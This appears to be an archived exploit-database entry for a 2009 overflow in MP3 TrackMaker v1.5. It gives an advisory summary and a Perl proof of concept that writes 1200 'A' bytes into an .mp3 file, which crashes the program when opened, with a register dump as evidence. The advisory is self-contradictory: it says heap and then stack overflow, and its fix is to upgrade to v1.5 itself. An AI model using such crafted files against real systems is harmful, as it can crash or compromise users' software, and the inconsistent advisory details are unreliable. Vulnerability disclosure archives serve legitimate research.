MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC

vendor:

MP3 TrackMaker

by:

Houssamix

7.5

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: MP3 TrackMaker

Affected Version From: v1.5

Affected Version To: v1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:heathcosoft:mp3_trackmaker:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC

MP3 TrackMaker v1.5 is vulnerable to a heap overflow vulnerability when a specially crafted .mp3 file is opened. The vulnerability is caused due to a boundary error when the application copies user-supplied data to a fixed-length buffer. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into opening a specially crafted .mp3 file.

Mitigation:

Upgrade to the latest version of MP3 TrackMaker v1.5

Source

Exploit-DB raw data:

# #!/bin/perl

# Author : HouSSamix

# MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC
# http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe

# open the program > browse (source file) > file exploit

#EAX 41414141  <<< 
#ECX 000000F8
#EDX 0000020A
#EBX 00000000
#ESP 0012F408
#EBP 0012F470
#ESI 00000000
#EDI 00000158
#EIP 7C91EB94 ntdll.KiFastSystemCallRet

print "===================================================================== \n";
print "Author : Houssamix  \n";
print "===================================================================== \n";
print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC						 \n";
print "===================================================================== \n\n";

my $file="hsmx.mp3";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE  "A" x 1200;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-09]